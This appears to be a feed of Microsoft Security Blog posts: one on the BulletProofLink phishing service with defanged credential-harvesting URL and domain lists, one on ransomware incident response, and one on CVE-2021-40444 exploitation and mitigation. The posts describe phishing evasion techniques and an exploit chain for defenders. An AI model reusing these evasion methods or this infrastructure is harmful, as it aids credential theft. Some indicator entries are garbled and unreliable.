  • It serves as a departure from previous techniques that involved hackers obtaining large sets of single-use domains. To leverage infinite subdomains for use in email links that serve to redirect to a smaller set of final landing pages, the attackers then only need to compromise the DNS of the site, and not the site itself.
  • It allows phishing operators to maximize the unique domains they are able to use by configuring dynamically generated subdomains as prefix to the base domain for each individual email.
  • The creation of unique URLs poses a challenge to mitigation and detection methods that rely solely on exact matching for domains and URLs.

The phishing campaign also impersonated (albeit poorly) the Microsoft logo and branding. The impersonation technique used solid colors for the logo, which may have been done intentionally to bypass detection of the Microsoft logo’s four distinct colors. It is worth noting that later iterations of the campaign have switched to using the four colors in the Microsoft logo.

Screenshot of recent lure used in a BulletProofLink campaign

Figure 10. Phishing lure from a recent credential phishing campaign

These messages also used a technique called zero-point font, which pads the HTML of the message with characters that render as invisible to the user, to obfuscate the email body and attempt to evade detection. This technique is increasingly used by phishers to evade detection.

Screenshot of email and HTML code showing zero-point font technique

Figure 11. HTML showing zero-point font date stuffing in an email

We found that the phishing URL in the email contained Base64-encoded victim information along with an attacker-owned site where the user is meant to be redirected. In this campaign, a single base domain was used for the infinite subdomain technique to initiate the redirects for the campaign, which leveraged multiple secondary sites over several weeks.

Screenshot of encoded URLs and the decoded URL

Figure 12. The format and an example of the phishing URL, which when decoded redirects to the compromised site.

The compromised site redirected to a second domain that hosted the phishing page, which mimicked the Outlook sign-in screen and is generated for each user-specific URL. We found that the page is generated for any number of email addresses entered into the URI, and had no checking mechanisms to guarantee that it wasn’t already used or was related to a live phishing email.

There can be one or more locations to which credentials are sent, but the page employed a few obfuscation techniques to obscure these locations. One attempt to obfuscate the password processing site’s location was by using a function that decodes the location based on calling back to an array of numbers and letters:

Screenshot of a function that decodes the location based on calling back to an array of numbers and letters

We reversed this in Python and found the site that the credentials were being sent to: hxxps://webpicture[.]cc/email-list/finish-unv2[.]php. The pattern “email-list/finish-unv2.php” came in one of these variations: finish-unv2[.]php, finish-unv22[.]php, or finish[.]php. These variations typically used the term “email-list” as well as another file path segment referencing a particular phishing page template, such as OneDrive or SharePoint.

Occasionally, multiple locations were used to send credentials to, including some that could be owned by the purchasing party instead of the operator themselves, which could be called in a separate function. This could be an example of legacy artifacts remaining in final templates, or of double-theft occurring.

Screenshot showing patterns of final site URL

Figure 13. The final site’s format comes in either of these pattern variations

Analyzing these patterns led us to an extensive list of password-capturing URIs detailed in an OSINT Fans blog post about the BulletProofLink phishing service operators. We noticed that they listed patterns similar to the ones we had just observed, enabling us to find the various templates BulletProofLink used, including the phishing email with the fake Microsoft logo discussed earlier.

One of the patterns we noted is that many of the password-processing domains used in the campaigns directly had associated email addresses with “Anthrax”,” BulletProofLink”, “BulletProftLink” or other terms in the certificate registration. The email addresses themselves were not listed identically on every certificate, and were also tied to domains not used exclusively for password-processing, as noted in additional reporting by OSINT Fans.

From then on, we drew even more similarities between the landing pages seen in the infinite subdomain surge campaign we were tracking and the existing in-depth research on the adversaries behind the BulletProofLink operations.

This process ultimately led us to track and expand on the same resources referenced in the OSINT Fans research, as we uncovered even more information about the long-running and large-scale phishing service BulletProofLink. Furthermore, we were able to uncover previous and current password-processing sites in use by the operator, as well as large segments of infrastructure hosted on legitimate hosting sites for this operation’s other components.

“Double theft” as a PhaaS monetization effort

The PhaaS working model as we’ve described it thus far is reminiscent of the ransomware-as-a-service (RaaS) model, which involves double extortion. The extortion method used in ransomware generally involves attackers exfiltrating and posting data publicly, in addition to encrypting them on compromised devices, to put pressure on organizations to pay the ransom. This lets attackers gain multiple ways to assure payment, while the released data can then be weaponized in future attacks by other operators. In a RaaS scenario, the ransomware operator has no obligation to delete the stolen data even if the ransom is already paid.

We have observed this same workflow in the economy of stolen credentials in phishing-as-a-service. With phishing kits, it is trivial for operators to include a secondary location for credentials to be sent to and hope that the purchaser of the phish kit does not alter the code to remove it. This is true for the BulletProofLink phishing kit, and in cases where the attackers using the service received credentials and logs at the end of a week instead of conducting campaigns themselves, the PhaaS operator maintained control of all credentials they resell.

In both ransomware and phishing, the operators supplying resources to facilitate attacks maximize monetization by assuring stolen data, access, and credentials are put to use in as many ways as possible. Additionally, victims’ credentials also likely to end up in the underground economy.

For a relatively simple service, the return of investment offers a considerable motivation as far as the email threat landscape goes.

How Microsoft Defender for Office 365 defends against PhaaS-driven phishing attacks

Investigating specific email campaigns allows us to ensure protections against particular attacks as well as similar attacks that use the same techniques, such as the infinite subdomain abuse, brand impersonation, zero-point font obfuscation, and victim-specific URI used in the campaign discussed in this blog. By studying phishing-as-a-service operations, we are able to scale and expand the coverage of these protections to multiple campaigns that use the services of these operations.

In the case of BulletProofLink, our intelligence on the unique phishing kits, phishing services, and other components of phishing attacks allows us to ensure protection against the many phishing campaigns this operation enables. Microsoft Defender for Office 365—which uses machine learning, heuristics, and an advance detonation technology to analyze emails, attachments, URLs, and landing pages in real time—recognizes the BulletProofLink phishing kit that serves the false sign-in pages and detects the associated emails and URLs.

In addition, based on our research into BulletProofLink and other PhaaS operations, we observed that numerous phishing kits leverage the code and behaviors of existing kits, such as those sold by BulletProofLink. Any kit that attempts to leverage similar techniques, or stitch together code from multiple kits can similarly be detected and remediated before the user receives the email or engages with the content.

With Microsoft 365 Defender, we’re able to further expand that protection, for example, by blocking of phishing websites and other malicious URLs and domains in the browser through  Microsoft Defender SmartScreen, as well as the detection of suspicious and malicious behavior on endpoints. Advanced hunting capabilities allow customers to search through key metadata fields on mailflow for the indicators listed in this blog and other anomalies. Email threat data is correlated with signals from endpoints and other domains, providing even richer intelligence and expanding investigation capabilities.

To build resilience against phishing attacks in general, organizations can use anti-phishing policies to enable mailbox intelligence settings, as well as configure impersonation protection settings for specific messages and sender domains. Enabling SafeLinks ensures real-time protection by scanning at time of delivery and at time of click.

In addition to taking full advantage of the tools available in Microsoft Defender for Office 365, administrators can further strengthen defenses against the threat of phishing by securing the Azure AD identity infrastructure. We strongly recommend enabling multifactor authentication and blocking sign-in attempts from legacy authentication.

Learn how you can stop credential phishing and other email threats through comprehensive, industry-leading protection with Microsoft Defender for Office 365.


Microsoft 365 Defender Threat Intelligence Team


Indicators of compromise

Password-processing URLs

  • hxxps://apidatacss[.]com/finish-unv22[.]php
  • hxxps://ses-smtp[.]com/email-list/office19999999/finish[.]php
  • hxxps:// ses-smtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps:// ses-smtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://smtpro101[.]com/email-list/onedrive25/finish[.]php
  • hxxps://smtpro101[.]com/email-list/office19999999/finish[.]php
  • hxxps://plutosmto[.]com/email-list/office365nw/finish[.]php
  • hxxps://smtptemp[.].site/email-list/office365nw/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://smtptemp[.]site/email-list/office365nw/finish-unv22[.]php
  • hxxps://apidatacss:com/finish-unv22[.]php
  • hxxps://[.]php
  • hxxps://[.]php
  • hxxps://plutosmto[.]com/email-list/kumar/finish[.]php
  • hxxps://[.]php
  • hxxps://jupitersmt[.]com/email-list/office365nw/finish[.]php
  • hxxps://plutosmto[.]com/email-list/onedrive25/finish[.]php
  • hxxps://plutosmto[.]com/email-list/sharepointbuisness/finish[.]php
  • hxxps://ghostsmtp[.]com/email-list/sharepoint/finish[.]php
  • hxxps://jupitersmt[.]com/email-list/otlk/finish[.]php
  • hxxps://earthsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://earthsmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/defaultcustomers/johnphilips002021/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/universalmail/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://moneysmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://moneysmtp[.]com/email-list/otlk/finish[.]php
  • hxxps://moneysmtp[.]com/hxxp://moneysmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://feesmtp[.]com/email-list/office365rd40/finish[.]php
  • hxxps://feesmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://Failedghostsmtp[.]com/email-list/sharepoint/finish[.]php
  • hxxps://bomohsmtp[.]com/email-list/office365-21/finish[.]php
  • hxxps://bomohsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://foxsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://dasmtp[.]com/email-list/dropboxoffice1/finish[.]php
  • hxxps://rosmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://ghostsmtp[.]com/email-list/adobe20/finish[.]php
  • hxxps://josmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://ghostsmtp[.]com:443/email-list/onedrive23/finish[.]php
  • hxxps://ghostsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://winsmtp[.]com/email-list/excel/finish[.]php
  • hxxps://linuxsmtp[.]com/email-list/adobe20/finish[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/office1/finish[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/onedrive23/finish[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/excel5/finish[.]php
  • hxxps://gpxsmtp[.]com/email-list/adobe3/finish[.]php
  • hxxps://gpxsmtp[.]com/email-list/office1/finish[.]php
  • hxxps://gpxsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://panelsmtp[.]com/email-list/onedrive-ar/finish[.]php
  • hxxps://mexsmtp[.]com/email-list/onedrive23/finish[.]php?phishing-processor
  • hxxps://racksmtp[.]com/email-list/domain-au1/finish[.]php
  • hxxps://racksmtp[.]com/email-list/finish[.]php
  • hxxps://racksmtp[.]com/email-list/sharepoint/finish[.]php
  • hxxps://mainsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://prvtsmtp[.]com/email-list/onedrive23/finish[.]php?i-am-a-phishing-processor
  • hxxps://prvtsmtp[.]com/email-list/onedrive23/finish[.]php?this-is-a-phishing-processor
  • hxxps://prvtsmtp[.]com/email-list/office1/finish[.]php
  • hxxps://prvtsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://apiserverdata1[.]com/email-list/office1/finish[.]php
  • hxxps://[.]php
  • hxxps://[.]php?this-is-a=phishing-processor
  • hxxps://valvadi101[.]com/email-list/office1/finish[.]php
  • hxxps://moneysmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://foxsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://bomohsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://rosmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://linuxsmtp[.]com/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://voksmtp[.]com/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://[.]php
  • hxxps://[.]php
  • hxxps://Failedsendapidata[.]com/email-list/finish-unv2[.]php
  • hxxps://[.]php?phishing-processor
  • hxxps://prvtsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://
  • hxxps://apiserverdata1[.]com/email-list/finish-unv2[.]php
  • hxxps://sendapidata[.]com/email-list/finish-unv2[.]php

Password-processing domains:

  • hxxps://apidatacss[.]com
  • hxxps://apiserverdata1[.]com
  • hxxps://baller[.]top
  • hxxps://
  • hxxps://f1smtp[.]com
  • hxxps://ghostsmtp[.]com
  • hxxps://gpxsmtp[.]com
  • hxxps://gurl101[.]services
  • hxxps://hostprivate[.]us
  • hxxps://josmtp[.]com
  • hxxps://link101[.]bid
  • hxxps://linuxsmtp[.]com
  • hxxps://migration101[.]us
  • hxxps://panelsmtp[.]com
  • hxxps://racksmtp[.]com
  • hxxps://rosmtp[.]com
  • hxxps://rxasmtp[.]com
  • hxxps://thegreenmy87[.]com
  • hxxps://vitme[.]bid
  • hxxps://voksmtp[.]com
  • hxxps://winsmtp[.]com
  • hxxps://trasactionsmtp[.]com
  • hxxps://moneysmtp[.]com
  • hxxps://foxsmtp[.]com
  • hxxps://bomohsmtp[.]com
  • hxxps://webpicture[.]cc
  • hxxps://Faileduebpicture[.]cc
  • hxxps://Failedsendapidata[.]com
  • hxxps://prvtsmtp[.]com
  • hxxps://sendapidata[.]com
  • hxxps://
  • hxxps://plutosmto[.]com
  • hxxps://laptopdata[.]xyz
  • hxxps://jupitersmt[.]com
  • hxxps://earthsmtp[.]com
  • hxxps://feesmtp[.]com
  • hxxps://Failedghostsmtp[.]com
  • hxxps://dasmtp[.]com
  • hxxps://mexsmtp[.]com
  • hxxps://mainsmtp[.]com
  • hxxps://valvadi101[.]com
  • hxxps://ses-smtp[.]com


The post Catching the big fish: Analyzing a large-scale phishing-as-a-service operation appeared first on Microsoft Security Blog.

A guide to combatting human-operated ransomware: Part 1

September 20th, 2021 No comments

This blog is part one of a two-part series focused on how Microsoft DART helps customers with human-operated ransomware. For more guidance on human-operated ransomware and how to defend against these extortion-based attacks, refer to our human-operated ransomware docs page.

Microsoft’s Detection and Response Team (DART) has helped customers of all sizes, across many industries and regions, investigate and remediate human-operated ransomware for over five years. This blog aims to explain the process and execution used in our customer engagements to provide perspective on the unique issues and challenges regarding human-operated ransomware. We will also discuss how DART leverages Microsoft solutions such as Microsoft Defender for Endpoint, Microsoft Defender for Identity, and Microsoft Cloud App Security (MCAS) within customer environments while collaborating with cross-functional threat intelligence teams across Microsoft who similarly track human-operated ransomware activities and behaviors.

Human-operated ransomware is not a malicious software problem—it’s a human criminal problem. The solutions used to address commodity problems aren’t enough to prevent a threat that more closely resembles a nation-state threat actor. It disables or uninstalls your antivirus software before encrypting files. They locate and corrupt or delete backups before sending a ransom demand. These actions are commonly done with legitimate programs that you might already have in your environment and are not considered malicious. In criminal hands, these tools are used maliciously to carry out attacks.

Responding to the increasing threat of ransomware requires a combination of modern enterprise configuration, up-to-date security products, and the vigilance of trained security staff to detect and respond to the threats before data is lost.

Key steps in DART’s approach to conducting ransomware incident investigations

To maximize DART’s efforts to restore business continuity while simultaneously analyzing the details of the incident, a careful and thorough investigation is coordinated with remediation measures to ensure that the root cause is determined. These efforts take place as we assist and advise customers with the task of getting the organization up and running again in a secure manner.

Every effort is made to determine how the adversary gained access to the customer’s assets so that vulnerabilities can be remediated. Otherwise, it is highly likely that the same type of attack will take place again in the future. In some cases, the threat actor takes steps to “cover their tracks” and destroy evidence, so it is possible that the entire chain of events may not be evident.

The following are three key steps in our ransomware investigations:

Graphic illustrates the steps, goals, and initial questions in DART’s ransomware investigation assistance.

Figure 1. Key steps in DART’s ransomware investigations.

1. Assess the current situation

This is critical to understanding the scope of the incident and for determining the best people to assist and to plan and scope the investigation and remediation tasks. Asking these initial questions is crucial in helping us determine the situation being dealt with:

What initially made you aware of the ransomware attack?

If the initial threat was identified by IT staff (like noticing backups being deleted, antivirus (AV) alert, endpoint detection and response (EDR) alert, suspicious system changes), it is often possible to take quick decisive measures to thwart the attack, typically by disabling all inbound and outbound internet communication. This may temporarily affect business operations, but that would typically be much less impactful than an adversary deploying ransomware.

If the threat was identified by a user call to the IT helpdesk, there may be enough advance warning to take defensive measures to prevent or minimize the effects of the attack. If the threat was identified by an external entity (like law enforcement or a financial institution), it is likely that the damage is already done, and you will see evidence in your environment that the threat actor has already gained administrative control of your network. This can range from ransomware notes, locked screens, or ransom demands.

What date/time did you first learn of the incident?

Establishing the initial activity date and time is important because it helps narrow the scope of the initial triage for “quick wins.” Additional questions may include:

  • What updates were missing on that date? This is important to understand what vulnerabilities may have been exploited by the adversary.
  • What accounts were used on that date?
  • What new accounts have been created since that date?

What logs (such as AV, EDR, and VPN) are available, and is there any indication that the actor is currently accessing systems?

Logs are an indicator of suspected compromise. Follow-up questions may include:

  • Are logs being aggregated in a SIEM (like Microsoft Azure Sentinel, Splunk, ArcSight) and current? What is the retention period of this data?
  • Are there any suspected compromised systems that are experiencing unusual activity?
  • Are there any suspected compromised accounts that appear to be actively used by the adversary?
  • Is there any evidence of active command and controls (C2s) in EDR, Firewall, VPN, Proxy, and other logs?

As part of assessing the current situation, DART may require a domain controller (DC) that was not ransomed, a recent backup of a DC, or a recent DC taken offline for maintenance/upgrades. We also ask our customers whether multifactor authentication (MFA) was required for everyone in the company and if Microsoft Azure Active Directory was used.

2. Identify line-of-business (LOB) apps that are unavailable due to the incident

This step is critical in figuring out the quickest way to get systems back online while obtaining the evidence required.

Does the application require an identity?

  • How is authentication performed?
  • How are credentials such as certificates or secrets stored and managed?

Are tested backups of the application, configuration, and data available?

Are the contents and integrity of backups regularly verified using a restore exercise? This is particularly important after configuration management changes or version upgrades.

3. Explain the compromise recovery (CR) process

This is a follow-up engagement that may be necessary if DART determines that the control plane (typically Active Directory) has been compromised.

DART’s investigation always has a goal of providing output that feeds directly into the CR process. CR is the process by which we remove the nefarious attacker control from an environment and tactically increase security posture within a set period. CR takes place post-security breach. To learn more about CR, read the Microsoft Compromise Recovery Security Practice team’s blog CRSP: The emergency team fighting cyber attacks beside customers.

Once we have gathered the responses to the questions above, we can build a list of tasks and assign owners. A key factor in a successful incident response engagement is thorough, detailed documentation of each work item (such as the owner, status, findings, date, and time), making the compilation of findings at the end of the engagement a straightforward process.

How DART leverages Microsoft security solutions to combat human-operated ransomware

DART leverages cross-functional teams, such as internal threat intelligence teams, who track adversary activities and behaviors, customer support, and product development teams behind Microsoft products and services. DART also collaborates with other incident response vendors the customer may have engaged and will share findings whenever possible.

DART relies heavily on data for all investigations. The team uses existing deployments of Microsoft solutions, such as Defender for Endpoint, Defender for Identity, and MCAS within customer environments along with custom forensic data collection for additional analysis. If these sensors are not deployed, DART also requests that the customer deploy these to gain deeper visibility into the environment, correlate against threat intelligence sources, and enable our analysts to scale in speed and agility.

Microsoft Defender for Endpoint

Microsoft Defender for Endpoint is Microsoft’s enterprise endpoint security platform designed to help enterprise network security analysts prevent, detect, investigate, and respond to advanced threats. As shown in the image below, Defender for Endpoint can detect attacks using advanced behavioral analytics and machine learning. DART analysts use Defender for Endpoint for attacker behavioral analytics.

Screengrab from the Microsoft Defender Security Center that shows a pass-the-ticket attack alert.

Figure 2. Sample alert in Microsoft Defender for Endpoint for a pass-the-ticket attack.

DART analysts can also perform advanced hunting queries to pivot off indicators of compromise (IOCs) or search for known behavior if a threat actor group is identified.

Screengrab from the Microsoft Defender Security Center that shows advanced hunting, a query-based threat hunting tool.

Figure 3. Advanced hunting queries to locate known attacker behavior.

In Defender for Endpoint, customers have access to a real-time expert-level monitoring and analysis service by Microsoft Threat Experts for ongoing suspected actor activity. Customers can also collaborate with experts on demand for additional insights into alerts and incidents.

Screengrab from the Microsoft Defender Security Center that shows sample ransomware alerts.

Figure 4. Defender for Endpoint shows detailed ransomware activity.

Microsoft Defender for Identity

DART leverages Microsoft Defender for Identity to investigate known compromised accounts and to find potentially compromised accounts in your organization. Defender for Identity sends alerts for known malicious activity that actors often use such as DCSync attacks, remote code execution attempts, and pass-the-hash attacks. Defender for Identity enables our team to pinpoint nefarious activity and accounts to narrow down our investigation.

Screengrab of alerts in Microsoft Defender for Identity showing malicious activity related to ransomware attacks.

Figure 5. Defender for Identity sends alerts for known malicious activity related to ransomware attacks.

Microsoft Cloud App Security

MCAS allows DART analysts to detect unusual behavior across cloud apps to identify ransomware, compromised users, or rogue applications. MCAS is Microsoft’s cloud access security broker (CASB) solution that allows for monitoring of cloud services and data access in cloud services by users.

Screengrab of the Microsoft Cloud App Security dashboard showing open alerts and a sample list of users to investigate.

Figure 6. The Microsoft Cloud App Security dashboard allows DART analysis to detect unusual behavior across cloud apps.

Microsoft Secure Score

The Microsoft 365 Defender stack provides live remediation recommendations to reduce the attack surface. Microsoft Secure Score is a measurement of an organization’s security posture, with a higher number indicating more improvement actions taken. Refer to our documentation to find out more about how your organization can leverage this feature to prioritize remediation actions that are based on their environment.

Understand your business risks

Beyond the immediate risk of encrypted files, understanding the disruption to business operations, data theft, extortion, follow-on attacks, regulatory and compliance reporting, and damage to reputation fall outside technical controls. Microsoft DART recommends each organization weigh these risks when determining the appropriate way to respond based on the organization’s policies, risk appetite, and applicable regulatory requirements.

Microsoft Defender for Endpoint, Microsoft Defender for Identity, and MCAS all work seamlessly together to provide customers with enhanced visibility of the attacker’s actions within and investigate attacks. Given our vast experience and expertise in investigating countless human-operated ransomware events over the past few years, we have shared what we consider best practices.

Learn more

Want to learn more about DART? Read our past blog posts.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post A guide to combatting human-operated ransomware: Part 1 appeared first on Microsoft Security Blog.

Additional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions

September 17th, 2021 No comments

On September 14, 2021, Microsoft released fixes for three Elevation of Privilege (EoP) vulnerabilities and one unauthenticated Remote Code Execution (RCE) vulnerability in the Open Management Infrastructure (OMI) framework:  CVE-2021-38645, CVE-2021-38649, CVE-2021-38648, and CVE-2021-38647, respectively.  Open Management Infrastructure (OMI) is an open-source Web-Based Enterprise Management (WBEM) implementation for managing Linux and UNIX systems. Several Azure Virtual Machine (VM) management extensions use this framework to …

Additional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions Read More »

Categories: Uncategorized Tags:

Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability

September 15th, 2021 No comments

In August, Microsoft Threat Intelligence Center (MSTIC) identified a small number of attacks (less than 10) that attempted to exploit a remote code execution vulnerability in MSHTML using specially crafted Microsoft Office documents. These attacks used the vulnerability, tracked as CVE-2021-40444, as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders. These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.

The observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document. Customers who enabled attack surface reduction rules to block Office from creating child processes are not impacted by the exploitation technique used in these attacks. While these attacks used a vulnerability to access entry point devices and run highly-privileged code, the secondary actions taken by the attackers still rely on stealing credentials and moving laterally to cause organization-wide impact. This illustrates the importance of investing in attack surface reduction, credential hygiene, and lateral movement mitigations. Customers are advised to apply the security patch for CVE-2021-40444 to fully mitigate this vulnerability.

This blog details our in-depth analysis of the attacks that used the CVE-2021-40444, provides detection details and investigation guidance for Microsoft 365 Defender customers, and lists mitigation steps for hardening networks against this and similar attacks. Our colleagues at RiskIQ conducted their own analysis and coordinated with Microsoft in publishing this research.

Exploit delivery mechanism

The initial campaigns in August 2021 likely originated from emails impersonating contracts and legal agreements, where the documents themselves were hosted on file-sharing sites. The exploit document used an external oleObject relationship to embed exploitative JavaScript within MIME HTML remotely hosted content that results in (1) the download of a CAB file containing a DLL bearing an INF file extension, (2) decompression of that CAB file, and (3) execution of a function within that DLL. The DLL retrieves remotely hosted shellcode (in this instance, a custom Cobalt Strike Beacon loader) and loads it into wabmig.exe (Microsoft address import tool.)

Screenshot of code showing the original exploit vector

Figure 1. The original exploit vector: an externally targeted oleObject relationship definition bearing an MHTML handler prefix pointed at an HTML file hosted on infrastructure that has similar qualities to the Cobalt Strike Beacon infrastructure that the loader’s payload communicates with.

Content that is downloaded from an external source is tagged by the Windows operating system with a mark of the web, indicating it was downloaded from a potentially untrusted source. This invokes Protected Mode in Microsoft Office, requiring user interaction to disable it to run content such as macros. However, in this instance, when opened without a mark of the web present, the document’s payload executed immediately without user interaction – indicating the abuse of a vulnerability.

diagram showing attack chain of DEV-0413 campaign that used CVE-2021-40444

Figure 2. Attack chain of DEV-0413 campaign that used CVE-2021-40444

DEV-0413 observed exploiting CVE-2021-40444

As part of Microsoft’s ongoing commitment to tracking both nation state and cybercriminal threat actors, we refer to the unidentified threat actor as a “development group” and utilize a threat actor naming structure with a prefix of “DEV” to indicate an emerging threat group or unique activity during the tracking and investigation phases before MSTIC reaches high confidence about the origin or identity of the actor behind an operation. MSTIC tracks a large cluster of cybercriminal activity involving Cobalt Strike infrastructure under the name DEV-0365.

The infrastructure we associate with DEV-0365 has several overlaps in behavior and unique identifying characteristics of Cobalt Strike infrastructure that suggest it was created or managed by a distinct set of operators. However, the follow-on activity from this infrastructure indicates multiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware). One explanation is that DEV-0365 is involved in a form of command- and-control infrastructure as a service for cybercriminals.

Additionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads — activity that overlaps with a group Microsoft tracks as DEV-0193. DEV-0193 activities overlap with actions tracked by Mandiant as UNC1878.

Due to the uncertainty surrounding the nature of the shared qualities of DEV-0365 infrastructure and the significant variation in malicious activity, MSTIC clustered the initial email campaign exploitation identified as CVE-2021-40444 activity separately, under DEV-0413.

The DEV-0413 campaign that used CVE-2021-40444 has been smaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure. We observed the earliest exploitation attempt of this campaign on August 18. The social engineering lure used in the campaign, initially highlighted by Mandiant, aligned with the business operations of targeted organizations, suggesting a degree of purposeful targeting. The campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted. In most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.

It is worth highlighting that while monitoring the DEV-0413 campaign, Microsoft identified active DEV-0413 infrastructure hosting CVE-2021-40444 content wherein basic security principles had not been applied. DEV-0413 did not limit the browser agents able to access the server to their malware implant or known targets, thereby permitting directory listing for their web server. In doing so, the attackers exposed their exploit to anyone who might have gained interest based on public social media discussion.

Screenshot of content of email in DEV-0413 campaign that used CVE-2021-40444

Figure 3. Content of the original DEV-0413 email lure seeking application developers

At least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack. It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.

In a later wave of DEV-0413 activity on September 1, Microsoft identified a lure change from targeting application developers to a “small claims court” legal threat.

Screenshot of another email lure used in the campaigns

Figure 4. Example of the “Small claims court” lure utilized by DEV-0413 

Vulnerability usage timeline

On August 21, 2021, MSTIC observed a social media post by a Mandiant employee with experience tracking Cobalt Strike Beacon infrastructure. This post highlighted a Microsoft Word document (SHA-256: 3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf) that had been uploaded to VirusTotal on August 19, 2021. The post’s focus on this document was highlighting the custom Cobalt Strike Beacon loader and did not focus on the delivery mechanism.

MSTIC analyzed the sample and determined that an anomalous oleObject relationship in the document was targeted at an external malicious HTML resource with an MHTML handler and likely leading to abuse of an undisclosed vulnerability. MSTIC immediately engaged the Microsoft Security Response Center and work began on a mitigation and patch. During this process, MSTIC collaborated with the original finder at Mandiant to reduce the discussion of the issue publicly and avoid drawing threat actor attention to the issues until a patch was available. Mandiant partnered with MSTIC and did their own reverse engineering assessment and submitted their findings to MSRC.

On September 7, 2021, Microsoft released a security advisory for CVE-2021-40444 containing a partial workaround. As a routine in these instances, Microsoft was working to ensure that the detections described in the advisory would be in place and a patch would be available before public disclosure. During the same time, a third-party researcher reported a sample to Microsoft from the same campaign originally shared by Mandiant. This sample was publicly disclosed on September 8. We observed a rise in exploitation attempts within 24 hours.

Line graph showing volume of observed exploitation attempts

Figure 5. Graphic showing original exploitation on August 18 and attempted exploitation increasing after public disclosure

Microsoft continues to monitor the situation and work to deconflict testing from actual exploitation. Since the public disclosure, Microsoft has observed multiple threat actors, including ransomware-as-a-service affiliates, adopting publicly disclosed proof-of-concept code into their toolkits. We will continue to provide updates as we learn more.

Mitigating the attacks

Microsoft has confirmed that the following attack surface reduction rule blocks activity associated with exploitation of CVE-2021-40444 at the time of publishing:

  • ​Block all Office applications from creating child processes

Apply the following mitigations to reduce the impact of this threat and follow-on actions taken by attackers.

  • Apply the security updates for CVE-2021-40444. Comprehensive updates addressing the vulnerabilities used in this campaign are available through the September 2021 security updates.
  • Run the latest version of your operating systems and applications. Turn on automatic updates or deploy the latest security updates as soon as they become available.
  • Use a supported platform, such as Windows 10, to take advantage of regular security updates.
  • Turn on cloud-delivered protectionin Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants.
  • Turn on tamper protectionin Microsoft Defender for Endpoint, to prevent malicious changes to security settings.
  • Run EDR in block modeso that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
  • Enable investigation and remediationin full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Use device discoveryto increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.

Microsoft 365 Defender detection details


Microsoft Defender Antivirus detects threat components as the following malware:

Endpoint detection and response (EDR)

Alerts with the following titles in the security center can indicate threat activity on your network:

  • Possible exploitation of CVE-2021-40444 (requires Defender Antivirus as the Active AV)

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

  • Suspicious Behavior By Office Application (detects the anomalous process launches that happen in exploitation of this CVE, and other malicious behavior)
  • Suspicious use of Control Panel item

Microsoft Defender for Office365

Signals from Microsoft Defender for Office 365 informs Microsoft 365 Defender, which correlates cross-domain threat intelligence to deliver coordinated defense, that this vulnerability has been detected when a document is delivered via email when detonation is enabled.

The following alerts in your portal will indicate that a malicious attachment has been blocked,  although these alerts are also used for many different threats:

  • Malware campaign detected and blocked
  • Malware campaign detected after delivery
